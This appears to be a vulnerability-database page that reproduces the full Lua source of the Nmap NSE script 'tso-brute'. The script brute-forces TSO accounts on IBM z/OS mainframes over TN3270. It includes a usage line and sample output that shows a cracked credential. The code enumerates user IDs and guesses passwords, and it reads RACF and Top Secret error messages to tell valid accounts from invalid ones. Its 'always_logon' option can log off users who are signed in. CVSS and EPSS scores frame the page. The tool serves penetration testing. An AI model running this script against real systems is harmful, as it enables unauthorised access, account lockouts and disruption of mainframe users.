9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%
TSO account brute forcer.
This script relies on the NSE TN3270 library which emulates a TN3270 screen for NMAP.
TSO user IDs have the following rules: - it cannot begin with a number - only contains alpha-numeric characters and @, #, $. - it cannot be longer than 7 chars
Commands in a semi-colon separated list needed to access TSO. Defaults to TSO
.
TSO logon can kick a user off if it guesses the correct password. always_logon, when set to true
, will logon, even if the user is logged in (kicking that user off). The default, false
will skip that account.
See the documentation for the brute library.
See the documentation for the creds library.
See the documentation for the unpwdb library.
nmap -p 2401 --script tso-brute <host>
23/tcp open tn3270 syn-ack IBM Telnet TN3270
| tso-brute:
| Node Name:
| IBMUSER:<skipped> - User logged on. Skipped.
| ZERO:<skipped> - User logged on. Skipped.
| COOL:secret - Valid credentials
|_ Statistics: Performed 6 guesses in 6 seconds, average tps: 1
Final times for host: srtt: 96305 rttvar: 72303 to: 385517
local stdnse = require "stdnse"
local shortport = require "shortport"
local tn3270 = require "tn3270"
local brute = require "brute"
local creds = require "creds"
local unpwdb = require "unpwdb"
local nmap = require "nmap"
local string = require "string"
local stringaux = require "stringaux"
description = [[
TSO account brute forcer.
This script relies on the NSE TN3270 library which emulates a
TN3270 screen for NMAP.
TSO user IDs have the following rules:
- it cannot begin with a number
- only contains alpha-numeric characters and @, #, $.
- it cannot be longer than 7 chars
]]
---
-- @usage
-- nmap -p 2401 --script tso-brute <host>
--
-- @output
-- 23/tcp open tn3270 syn-ack IBM Telnet TN3270
-- | tso-brute:
-- | Node Name:
-- | IBMUSER:<skipped> - User logged on. Skipped.
-- | ZERO:<skipped> - User logged on. Skipped.
-- | COOL:secret - Valid credentials
-- |_ Statistics: Performed 6 guesses in 6 seconds, average tps: 1
-- Final times for host: srtt: 96305 rttvar: 72303 to: 385517
--
-- @args tso-brute.commands Commands in a semi-colon separated list needed
-- to access TSO. Defaults to <code>TSO</code>.
--
-- @args tso-brute.always_logon TSO logon can kick a user off if it guesses
-- the correct password. always_logon, when set to <code>true</code>, will logon, even if
-- the user is logged in (kicking that user off). The default, <code>false</code> will
-- skip that account.
--
-- @changelog
-- 2015-10-29 - v0.1 - created by Soldier of Fortran
--
-- @author Philip Young
-- @copyright Same as Nmap--See https://nmap.org/book/man-legal.html
--
author = "Soldier of Fortran"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive"}
portrule = shortport.port_or_service({23,992,623}, {"tn3270"})
--- Registers User IDs that no longer need to be tested
--
-- @param username to stop checking
local function register_invalid( username )
if nmap.registry.tsoinvalid == nil then
nmap.registry.tsoinvalid = {}
end
stdnse.debug(2,"Registering %s", username)
nmap.registry.tsoinvalid[username] = true
end
Driver = {
new = function(self, host, port, options)
local o = {}
setmetatable(o, self)
self.__index = self
o.host = host
o.port = port
o.options = options
o.tn3270 = tn3270.Telnet:new(brute.new_socket())
o.tn3270:disable_tn3270e()
return o
end,
connect = function( self )
local status, err = self.tn3270:initiate(self.host,self.port)
self.tn3270:get_screen_debug(2)
if not status then
stdnse.debug("Could not initiate TN3270: %s", err )
return false
end
return true
end,
disconnect = function( self )
self.tn3270:disconnect()
self.tn3270 = nil
return true
end,
login = function (self, user, pass)
local commands = self.options['key1']
local always_logon = self.options['key2']
local skip = self.options['skip']
stdnse.debug(2,"Getting to TSO")
local run = stringaux.strsplit(";%s*", commands)
stdnse.verbose(2,"Trying User ID/Password: %s/%s", user, pass)
for i = 1, #run do
stdnse.debug(2,"Issuing Command (#%s of %s): %s", i, #run ,run[i])
if i == #run and run[i]:upper():find("LOGON APPLID") and skip then
stdnse.debug(2,"Trying User ID: %s", user)
self.tn3270:send_cursor(run[i] .. " DATA(" .. user .. ")")
elseif i == #run and skip then
stdnse.debug(2,"Trying User ID: %s", user)
self.tn3270:send_cursor(run[i] .. " " .. user)
else
self.tn3270:send_cursor(run[i])
end
self.tn3270:get_all_data()
end
if self.tn3270:find("%*%*%*") then -- For ACF2/TopSecret if required
self.tn3270:send_enter()
self.tn3270:get_all_data()
end
if not self.tn3270:find("ENTER USERID")
and not self.tn3270:find("TSO/E LOGON")
and not self.tn3270:find("IKJ56710I INVALID USERID") then
local err = brute.Error:new( "TSO Unavailable" )
-- This error occurs on too many concurrent application requests it
-- should be temporary. We use the new setReduce function.
err:setReduce(true)
stdnse.debug(1,"TSO Unavailable for UserID %s", pass )
return false, err
end
if not skip then
stdnse.debug(2,"Trying User ID: %s", user)
self.tn3270:send_cursor(user)
self.tn3270:get_all_data()
end
stdnse.debug(2,"Screen Received for User ID: %s", user)
self.tn3270:get_screen_debug(2)
if not self.tn3270:find('Enter LOGON parameters below') then
stdnse.debug(2,"Screen Received for User ID: %s", user)
self.tn3270:get_screen_debug(2)
-- This error occurs on too many concurrent application requests it
-- should be temporary. We use the new setReduce function.
local err = brute.Error:new( "Not at TSO" )
err:setReduce(true)
stdnse.debug(1,"TSO Unavailable for UserID %s", pass )
return false, err
end
if self.tn3270:find('not authorized to use TSO') then -- invalid user ID
stdnse.debug(2,"Got Message: IKJ56420I Userid %s not authorized to use TSO.", user)
-- Store the invalid ID in the registry so we don't keep trying it with subsequent passwords
-- when using the brute library.
register_invalid(user)
return false, brute.Error:new( "User ID not authorized to use TSO" )
else
-- It's a valid account so lets try a password
stdnse.debug(2,"%s is a valid TSO User ID. Trying Password: %s", string.upper(user), pass)
if always_logon then
local writeable = self.tn3270:writeable()
-- This turns on the 'reconnect' which may boot users off
self.tn3270:send_locations({{writeable[1][1],pass},{writeable[11][1],"S"}})
else
self.tn3270:send_cursor(pass)
end
self.tn3270:get_all_data()
while self.tn3270:isClear() do
-- the screen is blank for a few while it loads TSO
self.tn3270:get_all_data()
end
stdnse.debug(2,"Screen Received for User/Pass: %s/%s", user, pass)
self.tn3270:get_screen_debug(2)
if not always_logon and self.tn3270:find("already logged on") then
-- IKJ56425I LOGON rejected User already logged on to system
register_invalid(user)
return true, creds.Account:new(user, "<skipped>", "User logged on. Skipped.")
elseif (self.tn3270:find("IKJ56425I") and self.tn3270:find("IKJ56418I")) then
-- IKJ56425I LOGON REJECTED, RACF® TEMPORARILY REVOKING USER ACCESS
-- IKJ56418I CONTACT YOUR TSO ADMINISTRATOR
-- The first message (5I) is always followed by the second if the account it revoked
-- But not followed by the second message if its just logged on already
register_invalid(user) -- We dont want to keep generating errors
stdnse.verbose(3,"User: " .. user .. " LOCKED OUT")
return false, brute.Error:new("Account Locked out")
elseif not (self.tn3270:find("IKJ56421I") or
self.tn3270:find("IKJ56443I") or
self.tn3270:find("TSS7101E") or
self.tn3270:find("TSS714[0-3]E") or
self.tn3270:find("TSS7099E") or
self.tn3270:find("TSS7120E")) then
-- RACF:
-- IKJ56421I PASSWORD NOT AUTHORIZED FOR USERID
-- IKJ56443I TSOLOGON RECONNECT REJECTED - USER ACCESS REVOKED BY RACF
-- Top Secret:
-- TSS7101E Password is Incorrect
-- TSS7140E Accessor ID Has Expired: No Longer Valid
-- TSS7141E Use of Accessor ID Suspended
-- TSS7142E Accessor ID Not Yet Available for Use - Still Inactive
-- TSS7143E Accessor ID Has Been Inactive Too Long
-- TSS7120E PASSWORD VIOLATION THRESHOLD EXCEEDED
-- TSS7099E Signon credentials invalid
-- The 'MSG allows testers to discern any relevant messages they may get for the account'
stdnse.verbose(2,"Valid User/Pass: " .. user .. "/" .. pass)
stdnse.verbose(3,"Valid MSG for " .. user .. "/" .. pass .. ": " .. self.tn3270:get_screen():sub(1,80))
return true, creds.Account:new(user, pass, creds.State.VALID)
else
return false, brute.Error:new( "Incorrect password" )
end
end
end
}
--- Tests the target to see if we can even get to TSO
--
-- @param host host NSE object
-- @param port port NSE object
-- @param commands script-args of commands to use to get to TSO
-- @return status true on success, false on failure
-- @return name of security product installed
local function tso_test( host, port, commands )
stdnse.debug("Checking for TSO")
local tn = tn3270.Telnet:new()
tn:disable_tn3270e()
local status, err = tn:initiate(host,port)
local tso = false -- initially we're not at TSO logon panel
local secprod = "RACF"
tn:get_screen_debug(2) -- prints TN3270 screen to debug
if not status then
stdnse.debug("Could not initiate TN3270: %s", err )
return tso, "Could not Initiate TN3270"
end
local run = stringaux.strsplit(";%s*", commands)
for i = 1, #run do
stdnse.debug(2,"Issuing Command (#%s of %s): %s", i, #run ,run[i])
tn:send_cursor(run[i])
tn:get_all_data()
end
tn:get_screen_debug(2)
if tn:find("***") then
secprod = "TopSecret/ACF2"
end
if tn:find("ENTER USERID") or tn:find("TSO/E LOGON") then
tso = true
-- Patch OA44855 removed the ability to enumerate users
tn:send_cursor("notreal")
tn:get_all_data()
if tn:find("IKJ56476I ENTER PASSWORD") then
return false, secprod, "Enumeration is not possible. PASSWORDPREPROMPT is set to ON."
end
end
tn:send_pf(3)
tn:disconnect()
return tso, secprod, "Could not get to TSO. Try --script-args=tso-brute.commands='logon applid(tso)'. Aborting."
end
--- Tests the target to see if we can speed up brute forcing
-- VTAM/USSTable will sometimes allow you to put the userid
-- in the command area either through data() or just adding
-- the userid. This function will test for both
--
-- @param host host NSE object
-- @param port port NSE object
-- @param commands script-args of commands to use to get to TSO
-- @return status true on success, false on failure
local function tso_skip( host, port, commands )
stdnse.debug("Checking for IKJ56700A message skip")
local tn = tn3270.Telnet:new()
tn:disable_tn3270e()
stdnse.debug2("Connecting TN3270 to %s:%s", host.targetname or host.ip, port.number)
local status, err = tn:initiate(host,port)
stdnse.debug2("Displaying initial TN3270 Screen:")
tn:get_screen_debug(2) -- prints TN3270 screen to debug
if not status then
stdnse.debug("Could not initiate TN3270: %s", err )
return false
end
-- We're connected now to test.
local data = false
if commands:upper():find('LOGON APPLID') then
stdnse.debug(2,"Using LOGON command (%s) trying DATA() command", commands )
data = true
else
stdnse.debug(2,"Not using LOGON command, testing adding userid to command" )
end
local run = stringaux.strsplit(";%s*", commands)
for i = 1, #run do
stdnse.debug(2,"Issuing Command (#%s of %s): %s", i, #run ,run[i])
if i == #run then
if data then
stdnse.debug(2,"Sending "..run[i].." DATA(FAKEUSER)")
tn:send_cursor(run[i].." DATA(FAKEUSER)")
else
stdnse.debug(2,"Sending "..run[i].." FAKEUSER")
tn:send_cursor(run[i].." FAKEUSER")
end
else
tn:send_cursor(run[i])
end
tn:get_all_data()
end
tn:get_screen_debug(2)
if tn:find("IKJ56710I INVALID USERID") or
tn:find("Enter LOGON parameters below") then
stdnse.debug('IKJ56700A message skip supported')
return true
else
return false
end
end
-- Filter iterator for unpwdb usernames
-- TSO is limited to 7 alpha numeric and @, #, $ and can't start with a number
-- If this user ID has been confirmed to not be a valid TSO account
-- it will stop being passed to the brute engine
-- pattern:
-- ^%D = The first char must NOT be a digit
-- [%w@#%$] = All letters including the special chars @, #, and $.
local valid_name = function(x)
if nmap.registry.tsoinvalid and nmap.registry.tsoinvalid[x] then
return false
else
return (string.len(x) <= 7 and string.match(x,"^%D+[%w@#%$]"))
end
end
-- Checks string to see if it follows valid password limitations
local valid_pass = function(x)
local patt = "[%w@#%$]"
return (string.len(x) <= 8 and string.match(x,patt))
end
action = function( host, port )
local status, result
local commands = stdnse.get_script_args(SCRIPT_NAME .. '.commands') or "tso"
-- if a user is logged on this script will not try to logon as that user
-- because a user is only allowed to logon from one location. If you turn always_logon on
-- it will logon if it finds a valid username/password, kicking that user off
local always_logon = stdnse.get_script_args(SCRIPT_NAME .. '.always_logon') or false
local tsotst, secprod, err = tso_test(host, port, commands)
if tsotst then
stdnse.debug("Starting TSO Brute Force")
local options = { key1 = commands, key2 = always_logon, skip = tso_skip(host, port, commands) }
local engine = brute.Engine:new(Driver, host, port, options)
-- TSO has username/password restrictions.
-- This sets the iterators to use only valid TSO userids/passwords
engine:setUsernameIterator(unpwdb.filter_iterator(brute.usernames_iterator(),valid_name))
engine:setPasswordIterator(unpwdb.filter_iterator(brute.passwords_iterator(),valid_pass))
engine.options.script_name = SCRIPT_NAME
engine.options:setTitle("TSO Accounts")
status, result = engine:start()
return result
else
return err
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%